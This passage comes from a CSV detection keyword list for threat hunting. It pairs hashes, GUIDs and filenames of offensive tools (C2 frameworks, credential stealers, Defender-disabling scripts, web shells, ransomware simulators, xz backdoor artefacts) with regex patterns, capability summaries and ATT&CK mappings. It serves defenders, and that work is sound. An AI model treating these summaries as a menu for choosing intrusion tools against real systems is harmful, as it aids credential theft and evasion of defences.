Evasion","https://github.com/D00Movenok/HTMLSmuggler","1","1","N/A","10","2","135","19","2024-02-27T23:03:55Z","2023-07-02T08:10:59Z" "*d02161cdc91cdee273f8b6e47f98a322756847ae3b5f4efe6d439fa5e13f9039*",".{0,1000}d02161cdc91cdee273f8b6e47f98a322756847ae3b5f4efe6d439fa5e13f9039.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*d029b40b87bd1462c77138f017ab6914a3753c4ec47bcbf192231a6b2585cf36*",".{0,1000}d029b40b87bd1462c77138f017ab6914a3753c4ec47bcbf192231a6b2585cf36.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d0659e8489bc633b617e86f4e7994a593ada5cfc8463f79631d9672623b79750*",".{0,1000}d0659e8489bc633b617e86f4e7994a593ada5cfc8463f79631d9672623b79750.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*d0684a4f8a1dde0fefa5272d38fd96c21388f0398beff1a2847ff0c021611068*",".{0,1000}d0684a4f8a1dde0fefa5272d38fd96c21388f0398beff1a2847ff0c021611068.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*d0733560ad65a7123d380f6be4007ce0f0e56356f9dc1729e628342bb96892ab*",".{0,1000}d0733560ad65a7123d380f6be4007ce0f0e56356f9dc1729e628342bb96892ab.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d0844ed23aea55010cdfbca9d818cbf3baaa222ee8b30281b3534e60146583ff*",".{0,1000}d0844ed23aea55010cdfbca9d818cbf3baaa222ee8b30281b3534e60146583ff.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d091e408c0c5068b86bb69d17e91c5a7d6da46c0bd4101aa14f136246aed7f51*",".{0,1000}d091e408c0c5068b86bb69d17e91c5a7d6da46c0bd4101aa14f136246aed7f51.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*d09ccee4-pass-word-0000-98677e2356fd*",".{0,1000}d09ccee4\-pass\-word\-0000\-98677e2356fd.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*d0d03a0ae4722535a0e1d5d0c8385ce42015511e68d960fadef4b4eaf5942feb*",".{0,1000}d0d03a0ae4722535a0e1d5d0c8385ce42015511e68d960fadef4b4eaf5942feb.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*d0ebb728926cce530040e046a8ea2f47e01158581cb0b5cccddc91007b421f6c*",".{0,1000}d0ebb728926cce530040e046a8ea2f47e01158581cb0b5cccddc91007b421f6c.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*d0f189f26ac306b46efc221359e27629eb76c54a4cf0cec4e3731ab306bee0af*",".{0,1000}d0f189f26ac306b46efc221359e27629eb76c54a4cf0cec4e3731ab306bee0af.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*d0fd70c59cf45c5c1eb9c73ba1ccfa433d715a3a57b1312a26a02c60210cbfb8*",".{0,1000}d0fd70c59cf45c5c1eb9c73ba1ccfa433d715a3a57b1312a26a02c60210cbfb8.{0,1000}","offensive_tool_keyword","RdpThief","Extracting Clear Text Passwords from mstsc.exe using API Hooking.","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","0","N/A","10","10","1073","343","2019-11-13T14:13:52Z","2019-11-03T17:54:38Z" "*d162d2e96da627fac5a93d5e6faf379aff092bbd*",".{0,1000}d162d2e96da627fac5a93d5e6faf379aff092bbd.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*d16d7eaa9f5abcafb83da10a9b729f7c9b090bf209fd7b9ea820ed942c328d60*",".{0,1000}d16d7eaa9f5abcafb83da10a9b729f7c9b090bf209fd7b9ea820ed942c328d60.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*d18b648dfee767e09a9c580a9bd0c60edc5f9aa4718e41c15434c47630023efb*",".{0,1000}d18b648dfee767e09a9c580a9bd0c60edc5f9aa4718e41c15434c47630023efb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*D19BD978-267A-4BF0-85CC-851E280FF4C2*",".{0,1000}D19BD978\-267A\-4BF0\-85CC\-851E280FF4C2.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*D1AE1ACF-8AA2-4935-ACDF-EC22BAE2DF76*",".{0,1000}D1AE1ACF\-8AA2\-4935\-ACDF\-EC22BAE2DF76.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","7","7","619","83","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z" "*d1b43d39823d14ec9524f63fa0125ad9606d5c3e32d8e10d34a25214c56d308f*",".{0,1000}d1b43d39823d14ec9524f63fa0125ad9606d5c3e32d8e10d34a25214c56d308f.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","9","7","N/A","N/A","N/A","N/A" "*d1b7993dc84243e12f8b4650de9b71a85f5a3751c085d96f7211129c5e5f4eb0*",".{0,1000}d1b7993dc84243e12f8b4650de9b71a85f5a3751c085d96f7211129c5e5f4eb0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d1b8e13cf05c57e811ee4c90c985c018a7d1e937eca0f5860fecf36601032630*",".{0,1000}d1b8e13cf05c57e811ee4c90c985c018a7d1e937eca0f5860fecf36601032630.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*D1CCDA5D-E460-4ACC-B51A-730DE8F0ECF3*",".{0,1000}D1CCDA5D\-E460\-4ACC\-B51A\-730DE8F0ECF3.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*d1cd42f8663905f5e307c82b421093d7eb93b2d2a8d50f752ff0b8628b2bbc5a*",".{0,1000}d1cd42f8663905f5e307c82b421093d7eb93b2d2a8d50f752ff0b8628b2bbc5a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d1d4d168eeedd0867537ba4cf5befd1ea7adab62843d21088e6c51e27dec34c5*",".{0,1000}d1d4d168eeedd0867537ba4cf5befd1ea7adab62843d21088e6c51e27dec34c5.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","0","N/A","7","1","11","3","2024-02-18T20:55:05Z","2024-02-17T15:39:25Z" "*d1d8362d21a381b0703d4586b73ce78d5332507c62e1d90eb8eb83555db1d6c8*",".{0,1000}d1d8362d21a381b0703d4586b73ce78d5332507c62e1d90eb8eb83555db1d6c8.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*d1f5e8ada7197e67b7bdede4827104e286c63f24407bb9eef80cc7c2bd2e065f*",".{0,1000}d1f5e8ada7197e67b7bdede4827104e286c63f24407bb9eef80cc7c2bd2e065f.{0,1000}","offensive_tool_keyword","ShellServe","Multi-client network fileserver with integrated shell functionality crafted in C using system calls for efficient and direct file and command processing","T1059 - T1505 - T1046 - T1569","TA0002 - TA0007 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/7etsuo/ShellServe","1","0","N/A","6","1","N/A","N/A","N/A","N/A" "*d1fb14a96b35b807b6b2315bc198b778f0ced472685c708d757a5219ae06bba1*",".{0,1000}d1fb14a96b35b807b6b2315bc198b778f0ced472685c708d757a5219ae06bba1.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*d1fccb8acadbdefaf27f8680c74c40dba94e52734dd9704d38c0de7b10066f14*",".{0,1000}d1fccb8acadbdefaf27f8680c74c40dba94e52734dd9704d38c0de7b10066f14.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","0","N/A","8","2","154","32","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z" "*D1rkInject.cpp*",".{0,1000}D1rkInject\.cpp.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","154","27","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" "*D1rkInject.exe*",".{0,1000}D1rkInject\.exe.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","154","27","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" "*D1rkInject.iobj*",".{0,1000}D1rkInject\.iobj.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","154","27","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" "*D1rkInject.log*",".{0,1000}D1rkInject\.log.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","154","27","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" "*D1rkInject.sln*",".{0,1000}D1rkInject\.sln.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","154","27","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" "*D1rkInject.vcxproj*",".{0,1000}D1rkInject\.vcxproj.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","154","27","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" "*D1rkInject-main*",".{0,1000}D1rkInject\-main.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","154","27","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" "*D210570B-F1A0-4B66-9301-F7A54978C178*",".{0,1000}D210570B\-F1A0\-4B66\-9301\-F7A54978C178.{0,1000}","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","0","N/A","10","1","50","6","2024-02-12T17:51:24Z","2023-07-11T09:07:10Z" "*d24cfba28aeecfecb7698350ca04c4ed07f6a9b88b212bbcbaacd168372fa980*",".{0,1000}d24cfba28aeecfecb7698350ca04c4ed07f6a9b88b212bbcbaacd168372fa980.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*d27b61fa43a50888d967bd4fcc32e9c760086b4240a790561084298238be16ee*",".{0,1000}d27b61fa43a50888d967bd4fcc32e9c760086b4240a790561084298238be16ee.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*d28b91e8fef0277673acca0c19b034b4bcfdbd730760714fe673b535282b5a01*",".{0,1000}d28b91e8fef0277673acca0c19b034b4bcfdbd730760714fe673b535282b5a01.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*d29dcb85619d3c9f31070257e1abf0d1f2f2e23c7c3769a0c7aca9bdc16c2517*",".{0,1000}d29dcb85619d3c9f31070257e1abf0d1f2f2e23c7c3769a0c7aca9bdc16c2517.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d2b0e14706fc0c11bdc7d1b35463150bf11c12dbf63045d79c361f23abde33dc*",".{0,1000}d2b0e14706fc0c11bdc7d1b35463150bf11c12dbf63045d79c361f23abde33dc.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*d2d99c2dcb17923e9ce1d91e16491527edcdd945aa68e54d83bc6fc927274b05*",".{0,1000}d2d99c2dcb17923e9ce1d91e16491527edcdd945aa68e54d83bc6fc927274b05.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","10","10","N/A","N/A","N/A","N/A" "*d2d99c2dcb17923e9ce1d91e16491527edcdd945aa68e54d83bc6fc927274b05*",".{0,1000}d2d99c2dcb17923e9ce1d91e16491527edcdd945aa68e54d83bc6fc927274b05.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","https://www.virustotal.com/gui/file/d2d99c2dcb17923e9ce1d91e16491527edcdd945aa68e54d83bc6fc927274b05","10","10","N/A","N/A","N/A","N/A" "*d2f0e9bf854c80b08a355e367d8f8eefb6defc64c0c42e3a970bbd0aa9abfb8d*",".{0,1000}d2f0e9bf854c80b08a355e367d8f8eefb6defc64c0c42e3a970bbd0aa9abfb8d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*d2h5aXNwZW5uc3RhdGVzb2JhZGF0Zm9vdGJhbGw*",".{0,1000}d2h5aXNwZW5uc3RhdGVzb2JhZGF0Zm9vdGJhbGw.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*d2hvYW1p*",".{0,1000}d2hvYW1p.{0,1000}","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","10","8","759","138","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" "*d3074edd15856a4138978c24a2b4ba70f6a84abee3db440a710e6b8a2fd597d8*",".{0,1000}d3074edd15856a4138978c24a2b4ba70f6a84abee3db440a710e6b8a2fd597d8.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*D30C9D6B-1F45-47BD-825B-389FE8CC9069*",".{0,1000}D30C9D6B\-1F45\-47BD\-825B\-389FE8CC9069.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*d323294bc92b8ab3dc05085a795881b3d75c5b1128911bf7478be1fe39d60482*",".{0,1000}d323294bc92b8ab3dc05085a795881b3d75c5b1128911bf7478be1fe39d60482.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d3290c562ad2740c0ddfd8cee2c2239055cf1491f54127f48a4e64549145c6e5*",".{0,1000}d3290c562ad2740c0ddfd8cee2c2239055cf1491f54127f48a4e64549145c6e5.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation 